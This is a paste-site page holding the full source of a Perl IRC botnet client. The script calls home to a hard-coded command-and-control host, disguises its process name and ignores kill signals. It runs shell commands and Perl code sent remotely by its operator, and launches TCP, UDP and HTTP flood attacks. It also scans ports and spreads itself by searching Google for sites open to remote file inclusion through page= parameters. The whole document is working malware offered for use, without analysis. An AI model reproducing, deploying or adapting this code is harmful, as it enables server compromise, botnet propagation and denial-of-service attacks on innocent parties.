Bot

From Unknown, 3 Years ago, written in Perl, viewed 1'198 times.
URL http://paste.security-portal.cz/view/a582d4e7 Embed
Download Paste or View Raw
  1. #!/usr/bin/perl
  2. my $processo =("WATCHD0G");
  3.  
  4. my @titi = ("index.php?page=","main.php?page=");
  5.  
  6. my $goni = $titi[rand scalar @titi];
  7.  
  8. my $linas_max='3';
  9. my $sleep='7';
  10. my @adms=("Admin" );
  11. my @hostauth=("fbi.gov");
  12. my @canais=("#vfs");
  13. #my $procs=`ps -ef | grep -v grep | grep $processo | grep -c .`;
  14. #if( $procs > 0 ) {
  15. #    die "ERR $procs";
  16. #}
  17.  
  18. chop (my $nick = `uname`);
  19. my $ircname =("k");
  20. my $realname = ("z");
  21. my $servidor='xzvf.ungabriel.cu.cc';
  22. my $porta='8080';
  23. my $VERSAO = '0.5';
  24. $SIG{'INT'} = 'IGNORE';
  25. $SIG{'HUP'} = 'IGNORE';
  26. $SIG{'TERM'} = 'IGNORE';
  27. $SIG{'CHLD'} = 'IGNORE';
  28. $SIG{'PS'} = 'IGNORE';
  29. use IO::Socket;
  30. use Socket;
  31. use IO::Select;
  32. chdir("/tmp");
  33. $servidor="$ARGV[0]" if $ARGV[0];
  34. $0="$processo"."\0"x16;;
  35. my $procs=`ps -ef | grep -v grep | grep $processo | grep -c .`;
  36. if( $procs > 1 ) {
  37.     die "ERR $procs";
  38. }
  39.  
  40. my $pid=fork;
  41. exit if $pid;
  42. die "Problema com o fork: $!" unless defined($pid);
  43.  
  44. our %irc_servers;
  45. our %DCC;
  46. my $dcc_sel = new IO::Select->new();
  47.  
  48. $sel_cliente = IO::Select->new();
  49. sub sendraw {
  50.   if ($#_ == '1') {
  51.     my $socket = $_[0];
  52.     print $socket "$_[1]\n";
  53.   } else {
  54.       print $IRC_cur_socket "$_[0]\n";
  55.   }
  56. }
  57.  
  58. sub conectar {
  59.    my $meunick = $_[0];
  60.    my $servidor_con = $_[1];
  61.    my $porta_con = $_[2];
  62.  
  63.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  64.    if (defined($IRC_socket)) {
  65.      $IRC_cur_socket = $IRC_socket;
  66.  
  67.      $IRC_socket->autoflush(1);
  68.      $sel_cliente->add($IRC_socket);
  69.  
  70.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  71.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  72.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  73.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  74.      nick("$meunick");
  75.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  76.      sleep 1;
  77.    }
  78. }
  79. my $line_temp;
  80. while( 1 ) {
  81.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  82.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  83.    my @ready = $sel_cliente->can_read(0);
  84.    next unless(@ready);
  85.    foreach $fh (@ready) {
  86.      $IRC_cur_socket = $fh;
  87.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  88.      $nread = sysread($fh, $msg, 4096);
  89.      if ($nread == 0) {
  90.         $sel_cliente->remove($fh);
  91.         $fh->close;
  92.         delete($irc_servers{$fh});
  93.      }
  94.      @lines = split (/\n/, $msg);
  95.  
  96.      for(my $c=0; $c<= $#lines; $c++) {
  97.        $line = $lines[$c];
  98.        $line=$line_temp.$line if ($line_temp);
  99.        $line_temp='';
  100.        $line =~ s/\r$//;
  101.        unless ($c == $#lines) {
  102.          parse("$line");
  103.        } else {
  104.            if ($#lines == 0) {
  105.              parse("$line");
  106.            } elsif ($lines[$c] =~ /\r$/) {
  107.                parse("$line");
  108.            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  109.                parse("$line");
  110.            } else {
  111.                $line_temp = $line;
  112.            }
  113.        }
  114.       }
  115.    }
  116. }
  117.  
  118. sub parse {
  119.    my $servarg = shift;
  120.    if ($servarg =~ /^PING \:(.*)/) {
  121.      sendraw("PONG :$1");
  122.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  123.        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  124.        if ($args =~ /^\001VERSION\001$/) {
  125.          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
  126.        }
  127.        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
  128.        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
  129.          if ($onde eq "$meunick"){
  130.            shell("$pn", "$args");
  131.          }
  132.          if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
  133.             my $natrix = $1;
  134.             my $arg = $2;
  135.             if ($arg =~ /^\!(.*)/) {
  136.               ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
  137.             } elsif ($arg =~ /^\@(.*)/) {
  138.                 $ondep = $onde;
  139.                 $ondep = $pn if $onde eq $meunick;
  140.                 bfunc("$ondep","$1");
  141.             } else {
  142.                 shell("$onde", "$arg");
  143.             }
  144.          }
  145.        }
  146.         }
  147.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  148.        if (lc($1) eq lc($meunick)) {
  149.          $meunick=$4;
  150.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  151.        }
  152.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  153.        nick("$meunick|".int rand(999999));
  154.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  155.        $meunick = $2;
  156.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  157.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  158.        foreach my $canal (@canais) {
  159.          sendraw("JOIN $canal ddosit");
  160.        }
  161.    }
  162. }
  163.  
  164.  
  165. sub bfunc {
  166.   my $printl = $_[0];
  167.   my $funcarg = $_[1];
  168.   if (my $pid = fork) {
  169.      waitpid($pid, 0);
  170.   } else {
  171.       if (fork) {
  172.          exit;
  173.        } else {
  174.            if ($funcarg =~ /^portscan (.*)/) {
  175.              my $hostip="$1";
  176.              my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  177.              my (@aberta, %porta_banner);
  178.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");    
  179.              foreach my $porta (@portas)  {
  180.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
  181.                 if ($scansock) {
  182.                    push (@aberta, $porta);
  183.                    $scansock->close;
  184.                 }
  185.              }
  186.  
  187.              if (@aberta) {
  188.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
  189.              } else {
  190.                sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
  191.              }
  192.            }
  193.            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  194.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
  195.              my $itime = time;
  196.              my ($cur_time);
  197.              $cur_time = time - $itime;
  198.              while ($3>$cur_time){
  199.              $cur_time = time - $itime;
  200.              &tcpflooder("$1","$2","$3");
  201.              }
  202.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
  203.            }
  204.            if ($funcarg =~ /^version/) {
  205.                 sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);               
  206.                 }
  207.            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
  208.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
  209.              srand;
  210.              my $itime = time;
  211.              my ($cur_time);
  212.              my ($exploited);
  213.              $boturl=$2;
  214.              $cur_time = time - $itime;$exploited = 0;
  215.                 while($1>$cur_time){
  216.                     $cur_time = time - $itime;
  217.                     @urls=fetch();
  218.                         foreach $url (@urls) {
  219.                         $cur_time = time - $itime;
  220.                         my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
  221.  
  222.                         $url =$path."/$goni$boturl" ;
  223.  
  224.  
  225.  
  226.  
  227.                         $page = http_query($url);
  228.                         $exploited = $exploited + 1;
  229.                     }
  230.                 }
  231.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
  232.            }
  233.            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
  234.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
  235.              my $itime = time;
  236.              my ($cur_time);
  237.              $cur_time = time - $itime;
  238.              while ($2>$cur_time){
  239.              $cur_time = time - $itime;
  240.              my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  241.              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  242.              close($socket);
  243.              }
  244.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
  245.            }
  246.            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  247.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
  248.              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  249.              $dtime = 1 if $dtime == 0;
  250.              my %bytes;
  251.              $bytes{igmp} = $2 * $pacotes{igmp};
  252.              $bytes{icmp} = $2 * $pacotes{icmp};
  253.              $bytes{o} = $2 * $pacotes{o};
  254.              $bytes{udp} = $2 * $pacotes{udp};
  255.              $bytes{tcp} = $2 * $pacotes{tcp};
  256.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
  257.            }
  258.            exit;
  259.        }
  260.   }
  261. }
  262.  
  263. sub ircase {
  264.   my ($kem, $printl, $case) = @_;
  265.  
  266.   if ($case =~ /^join (.*)/) {
  267.      j("$1");
  268.    }
  269.  
  270. if ($case =~ /^refresh (.*)/) {
  271. my $goni = $titi[rand scalar @titi];
  272.  }
  273.  
  274.    if ($case =~ /^part (.*)/) {
  275.       p("$1");
  276.    }
  277.    if ($case =~ /^rejoin\s+(.*)/) {
  278.       my $chan = $1;
  279.       if ($chan =~ /^(\d+) (.*)/) {
  280.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  281.           p("$2");
  282.           j("$2");
  283.         }
  284.       } else {
  285.           p("$chan");
  286.           j("$chan");
  287.       }
  288.    }
  289.    if ($case =~ /^op/) {
  290.       op("$printl", "$kem") if $case eq "op";
  291.       my $oarg = substr($case, 3);
  292.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  293.    }
  294.    if ($case =~ /^deop/) {
  295.       deop("$printl", "$kem") if $case eq "deop";
  296.       my $oarg = substr($case, 5);
  297.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  298.    }
  299.    if ($case =~ /^msg\s+(\S+) (.*)/) {
  300.       msg("$1", "$2");
  301.    }
  302.    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  303.       for (my $cf = 1; $cf <= $1; $cf++) {
  304.         msg("$2", "$3");
  305.       }
  306.    }
  307.    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  308.       ctcp("$1", "$2");
  309.    }
  310.    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  311.       for (my $cf = 1; $cf <= $1; $cf++) {
  312.         ctcp("$2", "$3");
  313.       }
  314.    }
  315.    if ($case =~ /^nick (.*)/) {
  316.       nick("$1");
  317.    }
  318.    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  319.        conectar("$2", "$1", 6667);
  320.    }
  321.    if ($case =~ /^raw (.*)/) {
  322.       sendraw("$1");
  323.    }
  324.    if ($case =~ /^eval (.*)/) {
  325.      eval "$1";
  326.    }
  327. }
  328.  
  329. sub shell {
  330.   my $printl=$_[0];
  331.   my $comando=$_[1];
  332.   if ($pid = fork) {
  333.      waitpid($pid, 0);
  334.   } else {
  335.       if (fork) {
  336.          exit;
  337.        } else {
  338.            my @resp=`$comando 2>&1 3>&1`;
  339.            my $c=0;
  340.            foreach my $linha (@resp) {
  341.              $c++;
  342.              chop $linha;
  343.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  344.              if ($c == "$linas_max") {
  345.                $c=0;
  346.                sleep $sleep;
  347.              }
  348.            }
  349.            exit;
  350.        }
  351.   }
  352. }
  353.  
  354. sub tcpflooder {
  355.  my $itime = time;
  356.  my ($cur_time);
  357.  my ($ia,$pa,$proto,$j,$l,$t);
  358.  $ia=inet_aton($_[0]);
  359.  $pa=sockaddr_in($_[1],$ia);
  360.  $ftime=$_[2];
  361.  $proto=getprotobyname('tcp');
  362.  $j=0;$l=0;
  363.  $cur_time = time - $itime;
  364.  while ($l<1000){
  365.   $cur_time = time - $itime;
  366.   last if $cur_time >= $ftime;
  367.   $t="SOCK$l";
  368.   socket($t,PF_INET,SOCK_STREAM,$proto);
  369.   connect($t,$pa)||$j--;
  370.   $j++;$l++;
  371.  }
  372.  $l=0;
  373.  while ($l<1000){
  374.   $cur_time = time - $itime;
  375.   last if $cur_time >= $ftime;
  376.   $t="SOCK$l";
  377.   shutdown($t,2);
  378.   $l++;
  379.  }
  380. }
  381.  
  382. sub udpflooder {
  383.   my $iaddr = inet_aton($_[0]);
  384.   my $msg = 'A' x $_[1];
  385.   my $ftime = $_[2];
  386.   my $cp = 0;
  387.   my (%pacotes);
  388.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  389.  
  390.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  391.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  392.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  393.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  394.   return(undef) if $cp == 4;
  395.   my $itime = time;
  396.   my ($cur_time);
  397.   while ( 1 ) {
  398.      for (my $porta = 1; $porta <= 65000; $porta++) {
  399.        $cur_time = time - $itime;
  400.        last if $cur_time >= $ftime;
  401.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
  402.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  403.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  404.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  405.  
  406.        for (my $pc = 3; $pc <= 255;$pc++) {
  407.          next if $pc == 6;
  408.          $cur_time = time - $itime;
  409.          last if $cur_time >= $ftime;
  410.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  411.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  412.        }
  413.      }
  414.      last if $cur_time >= $ftime;
  415.   }
  416.   return($cur_time, %pacotes);
  417. }
  418.  
  419. sub ctcp {
  420.    return unless $#_ == 1;
  421.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  422. }
  423. sub msg {
  424.    return unless $#_ == 1;
  425.    sendraw("PRIVMSG $_[0] :$_[1]");
  426. }  
  427. sub notice {
  428.    return unless $#_ == 1;
  429.    sendraw("NOTICE $_[0] :$_[1]");
  430. }
  431. sub op {
  432.    return unless $#_ == 1;
  433.    sendraw("MODE $_[0] +o $_[1]");
  434. }
  435. sub deop {
  436.    return unless $#_ == 1;
  437.    sendraw("MODE $_[0] -o $_[1]");
  438. }
  439. sub j { &join(@_); }
  440. sub join {
  441.    return unless $#_ == 0;
  442.    sendraw("JOIN $_[0]");
  443. }
  444. sub p { part(@_); }
  445. sub part {
  446.   sendraw("PART $_[0]");
  447. }
  448. sub nick {
  449.   return unless $#_ == 0;
  450.   sendraw("NICK $_[0]");
  451. }
  452. sub quit {
  453.   sendraw("QUIT :$_[0]");
  454. }
  455.  
  456. # Spreader
  457. # this 'spreader' code isnot mine, i dont know who coded it.
  458. # update: well, i just fix0red this shit a bit.
  459. #
  460.  
  461. sub fetch(){
  462.     my $rnd=(int(rand(9999)));
  463.     my $n= 80;
  464.     if ($rnd<5000) { $n<<=1;}
  465.     my $s= (int(rand(5)) * $n);
  466.  
  467. my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
  468.                 "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
  469.                 "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
  470.                 "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
  471.                 "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
  472.                 "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
  473.                 "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
  474.                 "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",         
  475.                 "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
  476.                 "vu","vn","ye","yu","cd","zm","zw","");
  477. my @str;
  478.  
  479. foreach $dom  (@dominios)
  480. {
  481.         push (@str,"allinurl:%22".$dom."/".$goni."%22");
  482. }
  483.  
  484.     my $query="www.google.com/search?q=";
  485.     $query.=$str[(rand(scalar(@str)))];
  486.     $query.="&num=$n&start=$s";
  487.  
  488.  
  489.     my @lst=();
  490.     my $page = http_query($query);
  491.     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  492.         if ($1 !~ m/google|cache|translate/){
  493.             push (@lst,$1);
  494.         }
  495.     }
  496.     return (@lst);
  497. }
  498.  
  499.  
  500. sub http_query($){
  501.     my ($url) = @_;
  502.     my $host=$url;
  503.     my $query=$url;
  504.  
  505.     my $page="";
  506.     $host =~ s/href=\"?http:\/\///;
  507.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  508.     $query =~s/$host//;
  509.     if ($query eq "") {$query="/";};
  510.     eval {
  511.         local $SIG{ALRM} = sub { die "1";};
  512.         alarm 10;
  513.         my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  514.         print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  515.         my @r = <$sock>;
  516.         $page="@r";
  517.         alarm 0;
  518.         close($sock);
  519.     };    
  520.     return $page;
  521.  
  522. }
  523.  

Reply to "Bot"

Here you can reply to the paste above